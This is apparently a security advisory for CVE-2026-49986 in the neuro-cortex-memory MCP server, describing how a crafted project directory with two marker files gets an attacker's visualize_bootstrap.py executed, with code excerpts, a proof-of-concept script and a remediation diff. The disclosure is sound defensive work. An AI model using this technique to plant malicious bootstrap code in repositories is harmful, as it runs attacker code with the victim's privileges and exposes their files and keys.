PT-2026-55214 · Pypi · Neuro-Cortex-Memory

Publicado

2026-07-01

·

Atualizado

2026-07-01

·

CVE-2026-49986

CVSS v4.0

7.1

Alta

VetorAV:L/AC:L/AT:N/PR:L/UI:N/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N/E:P

Untrusted Project Bootstrap Code Execution via CLAUDE PROJECT DIR

Summary

The Cortex MCP server (neuro-cortex-memory) treats the CLAUDE PROJECT DIR environment variable — automatically set by Claude Code to the currently open project directory — as a trusted Cortex developer checkout. When the open visualization tool is invoked, find dev source() resolves the user's active project directory as a candidate Cortex source root. The only validation performed by is cortex root() is a check for the presence of an mcp server/ subdirectory and a ui/unified-viz.html file. An attacker who places these two marker files in a malicious repository can cause Cortex to execute an arbitrary mcp server/server/visualize bootstrap.py from that directory via subprocess.run([sys.executable, ...]), achieving code execution with the privileges of the victim's local user process. CVSS v3.1 Base Score: 7.8 (High).

Details

The vulnerability originates in find dev source() inside mcp server/handlers/open visualization.py. The function builds a list of candidate directories by iterating over the environment variables CORTEX DEV ROOT and CLAUDE PROJECT DIR:
python
# mcp server/handlers/open visualization.py:73-76
for env in ("CORTEX DEV ROOT", "CLAUDE PROJECT DIR"):
  v = os.environ.get(env)
  if v:
    candidates.append(Path(v))
CLAUDE PROJECT DIR is set automatically by the Claude Code IDE extension to whichever directory the user has currently open. This means any project the user opens is silently treated as a candidate Cortex source root.
Each candidate is then validated by is cortex root() (lines 65–70), which only verifies that the directory contains an mcp server/ subdirectory and a ui/unified-viz.html file — trivial markers that an attacker can replicate:
python
# mcp server/handlers/open visualization.py:65-70
def is cortex root(path: Path) -> bool:
  return (path / "mcp server").is dir() and 
      (path / "ui" / "unified-viz.html").is file()
There is no git remote identity check, no cryptographic signature verification, no release path allowlist, and no explicit developer opt-in requirement. Once a directory passes is cortex root(), the handler constructs a bootstrap path and executes it unconditionally:
python
# mcp server/handlers/open visualization.py:179-185
bootstrap path = dev src / "mcp server" / "server" / "visualize bootstrap.py"
if bootstrap path.is file():
  ...
  proc = subprocess.run(
    [sys.executable, str(bootstrap path)],
  )
A secondary code-execution path exists in mcp server/server/http launcher.py:80-83 and 273-275, where the same CLAUDE PROJECT DIR-derived dev source is used to rsync attacker-controlled files into the Cortex plugin cache directory before serving them.
Entry point: MCP tool open visualization, registered at mcp server/tool registry core.py:194-207 (no authentication required at tool layer). The tool is reachable through the standard stdio MCP transport started in mcp server/ main .py:66.

PoC

Prerequisites
  • Cortex (neuro-cortex-memory ≥ 3.17.0) installed and importable.
  • Victim opens an attacker-controlled project directory in Claude Code (sets CLAUDE PROJECT DIR automatically) or the attacker otherwise controls CLAUDE PROJECT DIR.
  • Victim invokes /cortex-visualize or triggers the open visualization MCP tool (e.g., by selecting a visualization command in the Claude Code interface).
Inline PoC
python
import asyncio, os, tempfile
from pathlib import Path
from mcp server.handlers import open visualization as ov

base = Path(tempfile.mkdtemp(prefix="cortex-malicious-project-"))
(base / "mcp server" / "server").mkdir(parents=True)
(base / "ui").mkdir()
(base / "ui" / "unified-viz.html").write text("<html>attacker</html>", encoding="utf-8")

sentinel = Path("/tmp/cortex-open-visualization-poc-owned")
if sentinel.exists():
  sentinel.unlink()

(base / "mcp server" / "server" / "visualize bootstrap.py").write text(
  "from pathlib import Path
"
  "Path('/tmp/cortex-open-visualization-poc-owned').write text('executed', encoding='utf-8')
"
  "print('bootstrap-ran')
",
  encoding="utf-8",
)

os.environ["CLAUDE PROJECT DIR"] = str(base)
ov.launch server = lambda typ: "http://127.0.0.1:3458"
ov.open in browser = lambda url: None

result = asyncio.run(ov.handler({}))
print(result.get("bootstrap"))
print(sentinel.read text())
Expected output:
bootstrap-ran
executed
Recommended Remediation
Remove CLAUDE PROJECT DIR from the dev-source candidate list. Gate executable dev-source resolution behind an explicit opt-in flag so that only a developer who deliberately sets both CORTEX DEV SOURCE SYNC=1 and CORTEX DEV ROOT can trigger the bootstrap path:
diff
--- a/mcp server/handlers/open visualization.py
+++ b/mcp server/handlers/open visualization.py
-  candidates: list[Path] = []
-  for env in ("CORTEX DEV ROOT", "CLAUDE PROJECT DIR"):
-    v = os.environ.get(env)
-    if v:
-      candidates.append(Path(v))
+  candidates: list[Path] = []
+  if os.environ.get("CORTEX DEV SOURCE SYNC") == "1":
+    v = os.environ.get("CORTEX DEV ROOT")
+    if v:
+      candidates.append(Path(v))
   candidates.append(Path.home() / "Documents" / "Developments" / "Cortex")
Apply the same change to mcp server/server/http launcher.py:80-83 to eliminate the secondary rsync execution path.

Impact

This is a local arbitrary code execution vulnerability. Any user who has the Cortex MCP plugin installed and opens (or is social-engineered into opening) an attacker-crafted project directory in Claude Code is at risk. When the victim invokes the open visualization tool (e.g., via the /cortex-visualize slash command), attacker-controlled Python code runs immediately with the full privileges of the victim's local user account — the same privileges used by Claude Code and the Cortex MCP server process.
Consequences include but are not limited to:
  • Confidentiality: exfiltration of files, secrets, environment variables, and SSH/GPG keys accessible to the local user.
  • Integrity: modification or deletion of local files, source code, credentials, and plugin caches.
  • Availability: termination of local processes or destruction of user data.
The secondary path through http launcher.py additionally allows the attacker to overwrite files in the Cortex plugin cache directory, potentially establishing persistence that survives after the malicious project is closed.
The attack requires the victim to invoke the visualization tool (UI:R), which is reflected in the CVSS score. No elevated privileges or prior authentication to any network service are required.

Correção

Encontrou algum problema na descrição? Tem algo a acrescentar? Fique à vontade para nos escrever 👾

Enumeração de Fraquezas

Identificadores relacionados

CVE-2026-49986
GHSA-GVPP-V77H-5W8G

Produtos afetados

Neuro-Cortex-Memory